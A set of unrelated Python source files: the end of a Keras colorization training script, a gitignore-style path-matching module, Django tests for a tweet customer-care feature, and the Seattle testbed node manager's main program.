name='m4_c4', )) model4.add(Convolution2D(64, 3, 3, border_mode='same', name='m4_c5', activation='relu')) model4.add(MaxPooling2D((2,2), name='m4_c6', strides=(2,2))) for i in xrange(0, len(model4.layers), 1): model4.layers[i].set_weights(l_model.layers[i].get_weights()) model4.layers[i].trainable = False model4.add(BatchNormalization(name='m4_c32')) model4.summary() print "\n\n\n\n===============================" model1.summary() model2.summary() print "===============================\n\n\n" model5 = Sequential() model5.add(Merge([model1, model2], mode = 'concat', name='m5_c0')) # model5.add(ZeroPadding2D((1,1), name='m5_c1')) model5.add(Convolution2D(128, 3, 3, border_mode='same', name='m5_c2', activation='relu')) model5.add(UpSampling2D((2,2), name='m5_c33')) model5.summary() model6 = Sequential() model6.add(Merge([model5, model3], mode = 'concat', name='m6_c0')) # model6.add(ZeroPadding2D((1,1), name='m6_c1')) model6.add(Convolution2D(64, 3, 3, border_mode='same', name='m6_c2', activation='relu')) model6.add(UpSampling2D((2,2), name='m6_c33')) model6.summary() print "\n\n\nModel7" model7 = Sequential() model7.add(Merge([model6, model4], mode = 'concat', name='m7_c0')) model7.add(Convolution2D(3, 3, 3, border_mode='same', name='m7_c4', activation='relu')) model7.add(UpSampling2D((2,2), name='76_c33')) model7.summary() print "\n\n\nModel8" model8 = Sequential() model8.add(ZeroPadding2D((0,0), name='m8_c2', input_shape=(img_rows, img_cols, input_channels))) model8.summary() print "\n\n\nModel9" model9 = Sequential() model9.add(Merge([model7, model8], mode = 'concat', name='m9_c0')) model9.add(Convolution2D(2 * bin_num, 3, 3, border_mode='same', name='m9_c4', activation='relu')) model9.add(Flatten()) model9.summary() model9.add(Reshape((img_rows * img_cols * 2, bin_num))) model9.add(Activation('softmax', name="act")) model9.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=["acc"]) model9.summary() for j in xrange(era): hist = model9.fit([X[test_img_num:], X[test_img_num:], X[test_img_num:], X[test_img_num:], X[test_img_num:]], Y[test_img_num:], batch_size=batch_size, nb_epoch=epoch, verbose=1, validation_split=validation_split, shuffle=True) if j % 10 == 0: for i in xrange(0, test_img_num): xx = X[i].flatten().reshape(1, img_rows, img_cols, input_channels) result = model9.predict_classes([xx, xx, xx, xx, xx]) print result reshaped = result.reshape(2, img_rows, img_cols) a, b = get_img_ab_unbinned(reshaped[0], reshaped[1]) im = reconstruct_image_by_lab_channels(X_l[i], a, b) im.save(img_output_path + imlist[i] + "_predicted_" + "era_" +str(j) + ".jpg", "jpeg") model_json = model9.to_json() with open("colorize_with_pretrain.json", "w") as json_file: json_file.write(model_json) model9.save_weights("colorize_with_pretrain.hdf5", overwrite=True)
# Copyright 2013 Dietrich Epp. # # This file is part of HeaderFix. HeaderFix is distributed under the terms of # the 2-clause BSD license. See LICENSE.txt for details. """Patterns for matching file paths.""" import fnmatch class PathPattern(object): """A pattern that matches paths using globbing. The pattern can be rooted or unrooted. Rooted patterns match against the beginning of the path, and unrooted patterns match against any part of the path. For example, the rooted pattern "/a/*" matches "/a/b" but not "/dir/a/b". The unrooted pattern "a/*" matches both "/a/b" and "/dir/a/b". """ __slots__ = ['rooted', 'parts'] def __init__(self, rooted, parts): self.rooted = bool(rooted) self.parts = tuple(parts) assert self.parts def match_dir(self, name): """Apply the pattern against a directory. Returns (match, patterns), where "match" is true if the directory itself matches the pattern, and "patterns" is a set of patterns relative to the directory. """ match = False patterns = [] if self.match_part(name, self.parts[0]): if (len(self.parts) == 1 or (len(self.parts) == 2 and not self.parts[1])): match = True else: patterns.append(self.__class__(True, self.parts[1:])) if not self.rooted: patterns.append(self) return match, patterns def match_file(self, name): """Determine whether this pattern matches a file.""" return (len(self.parts) == 1 and fnmatch.fnmatch(name, self.parts[0])) def __str__(self): pat = '/'.join(self.parts) return '/' + pat if self.rooted else pat @classmethod def parse(class_, string): directory = string.endswith('/') rooted = string.startswith('/') parts = [part for part in string.split('/') if part] if directory: parts.append('') return class_(rooted, parts) @staticmethod def match_part(fname, pattern): raise NotImplementedError('PathPattern.match_part') class LiteralPattern(PathPattern): @staticmethod def match_part(fname, pattern): return fname == pattern class GlobPattern(PathPattern): @staticmethod def match_part(fname, pattern): return fnmatch.fnmatch(fname, pattern) class PatternSet(object): """A set of positive and negative patterns.""" __slots__ = ['patterns'] def __init__(self, patterns=()): npatterns = [] for positive, pattern in patterns: if npatterns or positive: npatterns.append((positive, pattern)) self.patterns = tuple(npatterns) def __nonzero__(self): return bool(self.patterns) def match_dir(self, name): """Apply the pattern set against a directory. Returns (match, patternset), where "match" is true if the directory itself matches the pattern, and "patternset" is a new patternset relative to the directory. """ dir_patterns = [] dir_match = False for positive, pattern in self.patterns: pat_match, pat_patterns = pattern.match_dir(name) dir_patterns.extend( (positive, pat_pattern) for pat_pattern in pat_patterns) if pat_match: dir_match = positive return dir_match, PatternSet(dir_patterns) def match_file(self, name): """Determine whether this pattern set matches a file.""" result = False for positive, pattern in self.patterns: if result != positive and pattern.match_file(name): result = positive return result def union(self, other): """Compute the union of two PatternSet objects.""" if not self.patterns: return other if not other.patterns: return self return PatternSet(self.patterns, other.patterns) @classmethod def parse(class_, strings): """Make a pattern set by parsing a list of strings as patterns.""" patterns = [] for string in strings: if string.startswith('!'): positive = False string = string[1:] if not string: continue else: positive = True patterns.append((positive, GlobPattern.parse(string))) return class_(patterns) @classmethod def read(class_, fp): """Make a pattern set by parsing patterns from a file. This tries to use the same syntax as gitignore files. """ patterns = [] for line in fp: line = line.strip() if not line or line.startswith('#'): continue if line.startswith('!'): positive = False line = line[1:] else: positive = True patterns.append((positive, GlobPattern.parse(line))) return class_(patterns) def dump(self): print 'Patterns:' for positive, pattern in self.patterns: print ' {}{}'.format('' if positive else '!', str(pattern)) def match_path(self, path): """Test whether the pattern set matches a full path.""" parts = [part for part in path.split('/') if part] if path.endswith('/'): fname = None else: parts, fname = parts[:-1], parts[-1] patternset = self for dirname in parts: match, patternset = patternset.match_dir(dirname) if match: return True if not patternset: return False if fname is not None: return patternset.match_file(fname) return False if __name__ == '__main__': p = PatternSet.parse([ 'fname', '*.c', '!*.yy.c', 'subdir/*.h', '!*.yy.h', '/rooted/x/y', 'unrooted/x/y', '/rooted/x/*.py', 'unrooted/x/*.py', 'subdir/', '/rooted-subdir/', ]) checks = [ ('fname', True), ('abc.c', True), ('abc/def.c', True), ('abc.yy.c', False), ('abc/def.yy.c', False), ('fname/xyz', True), ('fname/abc.yy.c', True), ('rooted', False), ('rooted/x', False), ('rooted/x/y', True), ('rooted/x/z', False), ('rooted/x/file.py', True), ('rooted/x/y/z', True), ('a/rooted', False), ('a/rooted/x', False), ('a/rooted/x/y', False), ('a/rooted/x/z', False), ('a/rooted/x/file.py', False), ('a/rooted/x/y/z', False), ('subdir', False), ('subdir/', True), ('subdir/x', True), ('x/subdir', False), ('x/subdir/', True), ('x/subdir/x', True), ('rooted-subdir', False), ('rooted-subdir/', True), ('rooted-subdir/x', True), ('x/rooted-subdir', False), ('x/rooted-subdir/', False), ('x/rooted-subdir/x', False), ] for path, match in checks: if p.match_path(path) != match: raise Exception( 'Expected match={} for path={}'.format(match, path)) print 'Test passed'
from datetime import datetime, timedelta import json from django.conf import settings from mock import patch, Mock from nose.tools import eq_ from test_utils import RequestFactory from kitsune.customercare.models import Tweet, Reply from kitsune.customercare.tests import tweet, twitter_account, reply from kitsune.customercare.views import _get_tweets, _count_answered_tweets from kitsune.customercare.views import twitter_post from kitsune.sumo.tests import TestCase, LocalizingClient from kitsune.sumo.urlresolvers import reverse from kitsune.users.tests import user class TweetListTests(TestCase): """Tests for the customer care tweet list.""" def setUp(self): for i in range(0, 11): tweet(save=True) now = datetime.now() # Create a tweet older than CC_TWEETS_DAYS days older = now - timedelta(days=settings.CC_TWEETS_DAYS) tweet(save=True, created=older) # Create a tweet on the last CC_TWEETS_DAYS day last = now - timedelta(days=settings.CC_TWEETS_DAYS - 1) tweet(save=True, created=last) self.client.login(username=user(save=True), password='testpass') def _hide_tweet(self, id): url = reverse('customercare.hide_tweet', locale='en-US') return self.client.post(url, {'id': id}) def test_limit(self): """Do not return more than LIMIT tweets.""" tweets = _get_tweets(limit=2) eq_(len(tweets), 2) def test_newer_tweets_only(self): """Ensure that only tweets from the last CC_TWEETS_DAYS are shown""" tweets = _get_tweets() eq_(len(tweets), 12) def test_max_id(self): """Ensure max_id offset works.""" tweets_1 = _get_tweets() assert tweets_1 # Select max_id from the first list max_id = tweets_1[3]['id'] tweets_2 = _get_tweets(max_id=max_id) assert tweets_2 # Make sure this id is not in the result, and all tweets are # older than max_id. for t in tweets_2: assert t['id'] < max_id def test_hide_tweets(self): """Try hiding tweets.""" tw = Tweet.objects.filter(reply_to=None, hidden=False)[0] r = self._hide_tweet(tw.tweet_id) eq_(r.status_code, 200) # Re-fetch from database. Should be hidden. tw = Tweet.objects.get(tweet_id=tw.tweet_id) eq_(tw.hidden, True) # Hiding it again should work. r = self._hide_tweet(tw.tweet_id) eq_(r.status_code, 200) def test_hide_tweets_with_replies(self): """Hiding tweets with replies is not allowed.""" tw = tweet(save=True) reply_tw = tweet(save=True) reply_tw.reply_to_id = tw.tweet_id reply_tw.save() r = self.client.post( reverse('customercare.hide_tweet', locale='en-US'), {'id': tw.tweet_id}) eq_(r.status_code, 400) def test_hide_tweets_invalid_id(self): """Invalid tweet IDs shouldn't break anything.""" r = self._hide_tweet(123) eq_(r.status_code, 404) r = self._hide_tweet('cheesecake') eq_(r.status_code, 400) @patch.object(settings._wrapped, 'CC_ALLOW_REMOVE', False) def test_hide_tweets_disabled(self): """Do not allow hiding tweets if feature is disabled.""" tw = Tweet.objects.filter(reply_to=None)[0] r = self.client.post( reverse('customercare.hide_tweet', locale='en-US'), {'id': tw.tweet_id}) eq_(r.status_code, 418) # Don't tell a teapot to brew coffee. class CountTests(TestCase): def test_count_replies(self): """Test filtering when counting tweets""" tweet(save=True) id = Tweet.latest().tweet_id reply(reply_to_tweet_id=id, created=datetime.now(), save=True) reply(reply_to_tweet_id=id, created=datetime.now(), save=True) reply(created=datetime.now() - timedelta(days=1, minutes=1), save=True) yesterday = datetime.now() - timedelta(days=1) count_recent_answered = _count_answered_tweets(since=yesterday) eq_(count_recent_answered, 1) class FilterTestCase(TestCase): client_class = LocalizingClient def _tweet_list(self, filter): """Return the content of async-fetched tweet list. Also, assert the request returns a 200. """ response = self.client.get( reverse('customercare.more_tweets'), {'filter': filter}) eq_(response.status_code, 200) return response.content class FilterTests(FilterTestCase): """Test tweet filtering""" def setUp(self): """Set up FilterTests Make a tweet, an answer to it, an unanswered tweet, and a hidden one. """ super(FilterTests, self).setUp() tweet(text='YO_UNANSWERED').save() cry_for_help = tweet(text='YO_HELP_ME', save=True) tweet(text='YO_REPLY', reply_to=cry_for_help).save() tweet(text='YO_HIDDEN', hidden=True).save() def _test_a_filter(self, filter, should_show_unanswered, should_show_answered, should_show_reply, should_show_hidden): """Ensure the given filter shows the tweets specified.""" content = self._tweet_list(filter) assert ('YO_UNANSWERED' in content) == should_show_unanswered assert ('YO_HELP_ME' in content) == should_show_answered assert ('YO_REPLY' in content) == should_show_reply assert ('YO_HIDDEN' in content) == should_show_hidden def test_unanswered(self): self._test_a_filter('unanswered', True, False, False, False) def test_answered(self): self._test_a_filter('answered', False, True, True, False) def test_all(self): self._test_a_filter('all', True, True, True, True) def test_recent(self): self._test_a_filter('recent', True, True, True, False) def test_bogus(self): """Test a bogus filter, which should fall back to Recent.""" self._test_a_filter('bogus', True, True, True, False) class FilterCachingTests(FilterTestCase): """Test interaction of caching with filters""" def test_caching(self): """Refiltering list after replying shows replied-to tweet""" # We need at least one existing answer to get the list of answered # tweets to cache: question = tweet(save=True) tweet(reply_to=question).save() # Make a sad, sad, unanswered tweet: cry_for_help = tweet(text='YO_UNANSWERED', save=True) # Cache the list of answered tweets: self._tweet_list('answered') # Reply to the lonely tweet: tweet(text='YO_REPLY', reply_to=cry_for_help).save() # And make sure we can immediately see that we replied: assert 'YO_UNANSWERED' in self._tweet_list('answered') class TweetReplyTests(TestCase): """Test for the twitter_post view.""" client_class = LocalizingClient def _create_mocked_tweet_request(self): request = RequestFactory().post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) request.session = {} request.twitter = Mock() request.twitter.authed = True request.twitter.api = Mock() return_value = { 'id': 123456790, 'text': '@foobar try Aurora! #fxhelp', 'created_at': datetime.strftime(datetime.utcnow(), '%a %b %d %H:%M:%S +0000 %Y'), 'user': { 'lang': 'en', 'id': 42, 'screen_name': 'r1cky', 'profile_image_url': 'http://example.com/profile.jpg', 'profile_image_url_https': 'https://example.com/profile.jpg', } } request.twitter.api.update_status.return_value = return_value credentials = {'screen_name': 'r1cky'} request.twitter.api.verify_credentials.return_value = credentials request.user = user(save=True) return request def test_post_reply(self): # Create a Tweet to reply to. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a request and mock all the required properties and methods. request = RequestFactory().post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) request.session = {} request.twitter = Mock() request.twitter.authed = True request.twitter.api = Mock() return_value = { 'id': 123456790, 'text': '@foobar try Aurora! #fxhelp', 'created_at': datetime.strftime(datetime.utcnow(), '%a %b %d %H:%M:%S +0000 %Y'), 'user': { 'lang': 'en', 'id': 42, 'screen_name': 'r1cky', 'profile_image_url': 'http://example.com/profile.jpg', 'profile_image_url_https': 'https://example.com/profile.jpg', } } request.twitter.api.update_status.return_value = return_value credentials = {'screen_name': 'r1cky'} request.twitter.api.verify_credentials.return_value = credentials request.user = user(save=True) # Pass the request to the view and verify response. response = twitter_post(request) eq_(200, response.status_code) # Verify the reply was inserted with the right data. reply = Reply.objects.all()[0] eq_('r1cky', reply.twitter_username) eq_(1, reply.reply_to_tweet_id) eq_('@foobar try Aurora! #fxhelp', json.loads(reply.raw_json)['text']) def test_prevent_multiple_replies(self): t = tweet(save=True) eq_(t.replies.count(), 0) tweet(reply_to=t, save=True) eq_(t.replies.count(), 1) self.client.login(username=user(save=True).username, password='testpass') response = self.client.post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) eq_(response.status_code, 400) eq_(t.replies.count(), 1) def test_post_account_banned(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a banned TwitterAccoun twitter_account(username='r1cky', banned=True, save=True) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, False) def test_post_account_not_banned(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a valid TwitterAccount twitter_account(username='r1cky', banned=False, save=True) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, True) def test_post_account_not_exists(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, True)
""" Author: Justin Cappos Modified by Brent Couvrette to make use of circular logging. Modified by Eric Kimbrel to add NAT traversal Module: Node Manager main program. It initializes the other modules and doesn't do much else. Start date: September 3rd, 2008 This is the node manager for Seattle. It ensures that sandboxes are correctly assigned to users and users can manipulate those sandboxes safely. The design goals of this version are to be secure, simple, and reliable (in that order). The node manager has several different threads. An advertisement thread (nmadverise) that inserts entries into OpenDHT so that users and owners can locate their vessels. A status thread (nmstatusmonitor) that checks the status of vessels and updates statuses in the table used by the API. An accepter (nmconnectionmanager) listens for connections (preventing simple attacks) and puts them into a list. A worker thread (used in the nmconnectionmanager, nmrequesthandler, nmAPI) handles enacting the appropriate actions given requests from the user. The main thread initializes the other threads and monitors them to ensure they do not terminate prematurely (restarting them as necessary). """ # Let's make sure the version of python is supported import checkpythonversion checkpythonversion.ensure_python_version_is_supported() import os import sys import daemon import optparse import repyhelper #used to bring in NAT Layer # I need to make a cachedir for repyhelper... if not os.path.exists('nodemanager.repyhelpercache'): os.mkdir('nodemanager.repyhelpercache') # prepend this to my python path sys.path = ['nodemanager.repyhelpercache'] + sys.path repyhelpercachedir = repyhelper.set_importcachedir('nodemanager.repyhelpercache') # Armon: Prevent all warnings import warnings # Ignores all warnings warnings.simplefilter("ignore") from repyportability import * import time import threading import nmadvertise import nmstatusmonitor # Needed for use of the status monitor thread: import nmAPI import nmconnectionmanager # need to initialize the name, key and version (for when we return information # about us). Also we need the dictionary of vessel state so that the threads # can update / read it. import nmrequesthandler import persist import misc import runonce # for getruntime... import nonportable # for harshexit import harshexit import traceback import servicelogger repyhelper.translate_and_import('sha.repy') repyhelper.translate_and_import('rsa.repy') repyhelper.translate_and_import('ShimStackInterface.py') # Armon: To handle user preferrences with respect to IP's and Interfaces # I will re-use the code repy uses in emulcomm import emulcomm # One problem we need to tackle is should we wait to restart a failed service # or should we constantly restart it. For advertisement and status threads, # I've chosen to wait before restarting... For worker and accepter, I think # it's essential to keep restarting them as often as we can... # # these variables help us to track when we've started and whether or not we # should restart # the last time the thread was started thread_starttime = {} # the time I should wait thread_waittime = {} # never wait more than 5 minutes maxwaittime = 300.0 # or less than 2 seconds minwaittime = 2.0 # multiply by 1.5 each time... wait_exponent = 1.5 # and start to decrease only after a reasonable run time... reasonableruntime = 30 # and drop by decreaseamount = .5 # log a liveness message after this many iterations of the main loop LOG_AFTER_THIS_MANY_ITERATIONS = 600 # every 10 minutes # BUG: what if the data on disk is corrupt? How do I recover? What is the # "right thing"? I could run nminit again... Is this the "right thing"? version = "0.1t" # Our settings configuration = {} # Lock and condition to determine if the accepter thread has started accepter_state = {'lock':getlock(),'started':False} default_shim = '(NatDeciderShim)' FOREGROUND = False NAME_SERVER = "zenodotus.cs.washington.edu" # Number of seconds that our DNS record should live on the DNS server. DNS_CACHE_TTL = 600 # Weather or not to run the nodemanager in test mode TEST_NM = False # Dict to hold up-to-date nodename and boolean flags to track when to reset # advertisement and accepter threads (IP mobility) # If not behind NAT, name is node's IP:port # If behind a NAT, name is a string of the form NAT$UNIQUE_ID:port node_reset_config = { 'name': None, 'reset_advert': False, 'reset_accepter': False } # Initializes emulcomm with all of the network restriction information # Takes configuration, which the the dictionary stored in nodeman.cfg def initialize_ip_interface_restrictions(configuration): # Armon: Check if networking restrictions are enabled, appropriately generate the list of usable IP's # If any of our expected entries are missing, assume that restrictions are not enabled if 'networkrestrictions' in configuration and 'nm_restricted' in configuration['networkrestrictions'] \ and configuration['networkrestrictions']['nm_restricted'] and 'nm_user_preference' in configuration['networkrestrictions']: # Setup emulcomm to generate an IP list for us, setup the flags emulcomm.user_ip_interface_preferences = True # Add the specified IPs/Interfaces emulcomm.user_specified_ip_interface_list = configuration['networkrestrictions']['nm_user_preference'] # has the thread started? def should_start_waitable_thread(threadid, threadname): # first time! Let's init! if threadid not in thread_starttime: thread_waittime[threadid] = minwaittime thread_starttime[threadid] = 0.0 # If asking about advert thread and node_reset_config specifies to reset it, # then return True if threadid == 'advert' and node_reset_config['reset_advert']: # Before returning, turn off the reset flag node_reset_config['reset_advert'] = False return True # If it has been started, and the elapsed time is too short, always return # False to say it shouldn't be restarted if thread_starttime[threadid] and nonportable.getruntime() - thread_starttime[threadid] < thread_waittime[threadid]: return False for thread in threading.enumerate(): if threadname in str(thread): # running now. If it's run for a reasonable time, let's reduce the # wait time... if nonportable.getruntime() - thread_starttime[threadid] > reasonableruntime: thread_waittime[threadid] = max(minwaittime, thread_waittime[threadid]-decreaseamount) return False else: return True # this is called when the thread is started... def started_waitable_thread(threadid): thread_starttime[threadid] = nonportable.getruntime() thread_waittime[threadid] = min(maxwaittime, thread_waittime[threadid] ** wait_exponent) # has the thread started? def is_accepter_started(): accepter_state['lock'].acquire() result = accepter_state['started'] accepter_state['lock'].release() return result def start_accepter(): unique_id = rsa_publickey_to_string(configuration['publickey']) unique_id = sha_hexhash(unique_id) + str(configuration['service_vessel']) unique_id += "." + NAME_SERVER # do this until we get the accepter started... while True: if not node_reset_config['reset_accepter'] and is_accepter_started(): # we're done, return the name! return myname else: for possibleport in configuration['ports']: try: servicelogger.log("[INFO]: Trying to wait") # We advertise the unique_id first so that we can perform waitforconn # on it later. It's tempting to do a waitforconn directly on the # current IP, but IPs are not unique. If we are behind a NAT, our IP # can be some private address which may have duplicates registered in # the NAT forwarder. As a result, a client may not be able to locate # us within the NAT forwarder. Hence, waitforconn must occur on a unique # resolvable name. advertise_to_DNS(unique_id) timeout_waitforconn(unique_id, possibleport, nmconnectionmanager.connection_handler, timeout=10, use_shim=True, shim_string=default_shim) except Exception, e: servicelogger.log("[ERROR]: when calling waitforconn for the connection_handler: " + str(e)) servicelogger.log_last_exception() else: # the waitforconn was completed so the accepter is started accepter_state['lock'].acquire() accepter_state['started']= True accepter_state['lock'].release() # assign the nodemanager name myname = unique_id + ":" + str(possibleport) servicelogger.log("[INFO]: Now listening as " + myname) break else: servicelogger.log("[ERROR]: cannot find a port for waitforconn.") # Saves myname to a file so that unit test programs can connect to me using shim's naming system advertised_name_file_obj = open('advertised_name', 'w') advertised_name_file_obj.write(myname) advertised_name_file_obj.close() # check infrequently time.sleep(configuration['pollfrequency']) # has the thread started? def is_worker_thread_started(): for thread in threading.enumerate(): if 'WorkerThread' in str(thread): return True else: return False def start_worker_thread(sleeptime): if not is_worker_thread_started(): # start the WorkerThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... workerthread = nmconnectionmanager.WorkerThread(sleeptime) workerthread.setDaemon(True) workerthread.start() # has the thread started? def is_advert_thread_started(): for thread in threading.enumerate(): if 'Advertisement Thread' in str(thread): return True else: return False def start_advert_thread(vesseldict, myname, nodekey): if should_start_waitable_thread('advert','Advertisement Thread'): # start the AdvertThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... advertthread = nmadvertise.advertthread(vesseldict, nodekey) nmadvertise.myname = myname advertthread.setDaemon(True) advertthread.start() started_waitable_thread('advert') def is_status_thread_started(): for thread in threading.enumerate(): if 'Status Monitoring Thread' in str(thread): return True else: return False def start_status_thread(vesseldict,sleeptime): if should_start_waitable_thread('status','Status Monitoring Thread'): # start the StatusThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... statusthread = nmstatusmonitor.statusthread(vesseldict, sleeptime, nmAPI) statusthread.setDaemon(True) statusthread.start() started_waitable_thread('status') def advertise_to_DNS(unique_id): """ Advertise unique_id to the zenodotus DNS server. We strip away whatever that follows the NAME_SERVER part of the unique_id. For instance, if our unique_id is abc.NAME_SERVER:1234@xyz, then we only advertise abc.NAME_SERVER. """ # IP that maps to the unique_id myip = emulcomm.getmyip() # Extract the part of unique_id up to the name server, # i.e. xyz.zenodotus.washington.edu, and discard whatever that follows name_server_pos = unique_id.find(NAME_SERVER) if name_server_pos > -1: unique_id = unique_id[0 : name_server_pos + len(NAME_SERVER)] else: raise Exception("Invalid unique_id format: '" + str(unique_id) + "'") advertise_success = False # We keep trying until successful advertisement (Fix for Ticket #956) while not advertise_success: try: advertise_announce(unique_id, myip, DNS_CACHE_TTL) servicelogger.log("[INFO]: Advertised " + str(unique_id) + " which maps to " + myip) advertise_success = True except Exception, error: if 'announce error' in str(error): # We can confidently drop the exception here. The advertisement service # can sometimes be flaky, yet it can guarantee advertisement of our # key-value pair on at least one of the three components. Thus, we are # printing the error message as a warning here. advertise_success = True else: advertise_success = False # lots of little things need to be initialized... def main(): global configuration if not FOREGROUND: # Background ourselves. daemon.daemonize() # Check if we are running in testmode. if TEST_NM: nodemanager_pid = os.getpid() servicelogger.log("[INFO]: Running nodemanager in test mode on port <nodemanager_port>, "+ "pid %s." % str(nodemanager_pid)) nodeman_pid_file = open(os.path.join(os.getcwd(), 'nodemanager.pid'), 'w') # Write out the pid of the nodemanager process that we started to a file. # This is only done if the nodemanager was started in test mode. try: nodeman_pid_file.write(str(nodemanager_pid)) finally: nodeman_pid_file.close() else: # ensure that only one instance is running at a time... gotlock = runonce.getprocesslock("seattlenodemanager") if gotlock == True: # I got the lock. All is well... pass else: if gotlock: servicelogger.log("[ERROR]:Another node manager process (pid: " + str(gotlock) + ") is running") else: servicelogger.log("[ERROR]:Another node manager process is running") return # I'll grab the necessary information first... servicelogger.log("[INFO]:Loading config") # BUG: Do this better? Is this the right way to engineer this? configuration = persist.restore_object("nodeman.cfg") # Armon: initialize the network restrictions initialize_ip_interface_restrictions(configuration) # ZACK BOKA: For Linux and Darwin systems, check to make sure that the new # seattle crontab entry has been installed in the crontab. # Do this here because the "nodeman.cfg" needs to have been read # into configuration via the persist module. if nonportable.ostype == 'Linux' or nonportable.ostype == 'Darwin': if 'crontab_updated_for_2009_installer' not in configuration or \ configuration['crontab_updated_for_2009_installer'] == False: try: import update_crontab_entry modified_crontab_entry = \ update_crontab_entry.modify_seattle_crontab_entry() # If updating the seattle crontab entry succeeded, then update the # 'crontab_updated_for_2009_installer' so the nodemanager no longer # tries to update the crontab entry when it starts up. if modified_crontab_entry: configuration['crontab_updated_for_2009_installer'] = True persist.commit_object(configuration,"nodeman.cfg") except Exception,e: exception_traceback_string = traceback.format_exc() servicelogger.log("[ERROR]: The following error occured when " \ + "modifying the crontab for the new 2009 " \ + "seattle crontab entry: " \ + exception_traceback_string) # get the external IP address... myip = None while True: try: # Try to find our external IP. myip = emulcomm.getmyip() except Exception, e: # If we aren't connected to the internet, emulcomm.getmyip() raises this: if len(e.args) >= 1 and e.args[0] == "Cannot detect a connection to the Internet.": # So we try again. pass else: # It wasn't emulcomm.getmyip()'s exception. re-raise. raise else: # We succeeded in getting our external IP. Leave the loop. break time.sleep(0.1) vesseldict = nmrequesthandler.initialize(myip, configuration['publickey'], version) # Start accepter... myname = start_accepter() # Initialize the global node name inside node reset configuration dict node_reset_config['name'] = myname #send our advertised name to the log servicelogger.log('myname = '+str(myname)) # Start worker thread... start_worker_thread(configuration['pollfrequency']) # Start advert thread... start_advert_thread(vesseldict, myname, configuration['publickey']) # Start status thread... start_status_thread(vesseldict,configuration['pollfrequency']) # we should be all set up now. servicelogger.log("[INFO]:Started") # I will count my iterations through the loop so that I can log a message # periodically. This makes it clear I am alive. times_through_the_loop = 0 last_advertise_to_DNS_time = time.time() # BUG: Need to exit all when we're being upgraded while True: # E.K Previous there was a check to ensure that the accepter # thread was started. There is no way to actually check this # and this code was never executed, so i removed it completely myname = node_reset_config['name'] # Refresh the DNS cache if the duration from when we last advertised is # longer than half of the TTL. This guarantees we advertise our name before # it expires in the DNS cache. if 2 * (time.time() - last_advertise_to_DNS_time) > DNS_CACHE_TTL: advertise_to_DNS(myname) last_advertise_to_DNS_time = time.time() if not is_worker_thread_started(): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting worker...") start_worker_thread(configuration['pollfrequency']) if should_start_waitable_thread('advert','Advertisement Thread'): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting advert...") start_advert_thread(vesseldict, myname, configuration['publickey']) if should_start_waitable_thread('status','Status Monitoring Thread'): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting status...") start_status_thread(vesseldict,configuration['pollfrequency']) if not TEST_NM and not runonce.stillhaveprocesslock("seattlenodemanager"): servicelogger.log("[ERROR]:The node manager lost the process lock...") harshexit.harshexit(55) # Check for ip change. current_ip = None while True: try: current_ip = emulcomm.getmyip() except Exception, e: # If we aren't connected to the internet, emulcomm.getmyip() raises this: if len(e.args) >= 1 and e.args[0] == "Cannot detect a connection to the Internet.": # So we try again. pass else: # It wasn't emulcomm.getmyip()'s exception. re-raise. raise else: # We succeeded in getting our external IP. Leave the loop. break time.sleep(0.1) # If ip has changed, then restart the advertisement and accepter threads. if current_ip != myip: servicelogger.log('[WARN]:At ' + str(time.time()) + ' node ip changed...') myip = current_ip # Restart the accepter thread and update nodename in node_reset_config node_reset_config['reset_accepter'] = True myname = start_accepter() node_reset_config['name'] = myname # Restart the advertisement thread node_reset_config['reset_advert'] = True start_advert_thread(vesseldict, myname, configuration['publickey']) time.sleep(configuration['pollfrequency']) # if I've been through the loop enough times, log this... times_through_the_loop = times_through_the_loop + 1 if times_through_the_loop % LOG_AFTER_THIS_MANY_ITERATIONS == 0: servicelogger.log("[INFO]: node manager is alive...") def parse_arguments(): """ Parse all the arguments passed in through the command line for the nodemanager. This way in the future it will be easy to add and remove options from the nodemanager. """ # Create the option parser parser = optparse.OptionParser(version="Seattle " + version) # Add the --foreground option. parser.add_option('--foreground', dest='foreground', action='store_true', default=False, help="Run the nodemanager in foreground " + "instead of daemonizing it.") # Add the --test-mode optino. parser.add_option('--test-mode', dest='test_mode', action='store_true', default=False, help="Run the nodemanager in test mode.") # Add the using shim capability. # --shims [shim name]: Forces use of the specified shims. The shim name must # conform to the format as specified in: # https://seattle.cs.washington.edu/wiki/UsingShims. parser.add_option('--shims', type="string", dest="shim_name", help="Use a user specified shim instead of the" + " default (NatDeciderShim)") # Parse the argumetns. options, args = parser.parse_args() # Set some global variables. global FOREGROUND global TEST_NM global default_shim # Analyze the options if options.foreground: FOREGROUND = True if options.test_mode: TEST_NM = True if options.shim_name: servicelogger.log("[INFO]: Using user-specified shims " + options.shim_name) default_shim = options.shim_name if __name__ == '__main__': """ Start up the nodemanager. We are going to setup the servicelogger, then parse the arguments and then start everything up. """ # Initialize the service logger. We need to do this before calling main # because we want to print exceptions in main to the service log servicelogger.init('nodemanager') # Parse the arguments passed in the command line to set # different variables. parse_arguments() # Armon: Add some logging in case there is an uncaught exception try: main() except Exception,e: # If the servicelogger is not yet initialized, this will not be logged. servicelogger.log_last_exception() # Since the main thread has died, this is a fatal exception, # so we need to forcefully exit harshexit.harshexit(15)
